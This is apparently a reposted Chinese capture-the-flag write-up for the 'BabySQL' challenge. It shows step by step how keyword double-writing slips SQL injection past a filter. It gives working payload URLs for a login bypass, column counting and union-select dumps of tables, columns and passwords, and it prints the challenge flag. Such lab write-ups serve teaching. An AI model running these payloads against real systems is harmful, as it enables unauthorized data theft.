• [极客大挑战 2019]BabySQL


    这个题目比上次多了一点过滤,但也就一点,可以用双写绕过。

    在这里插入图片描述
    这里构造oorr,因为会过滤掉中间那个or,然后语句就变为了1' or 1=1#

    在这里插入图片描述
    还是没变,账号是admin。接下来开始爆字段。
    ?username=admin&password=1'+oorrder+bbyy+1#
    这里输入时候的空格在url会变成加号

    在这里插入图片描述
    order by 4的时候报错,字段数为3.
    开始爆数据库名:
    ?username=admin&password=1%27+ununionion+selselectect+1%2C2%2Cdatabase%28%29%23在这里插入图片描述
    开始爆表:
    ?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23在这里插入图片描述

    爆字段
    ?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
    在这里插入图片描述
    爆flag:
    ?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23在这里插入图片描述

    flag{15557f52-8110-4c9a-8993-3f6c49e5ffc9}

  • 相关阅读:
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
    EUI库
  • 原文地址:https://www.cnblogs.com/shenjuxian/p/13702745.html
Copyright © 2020-2023  润新知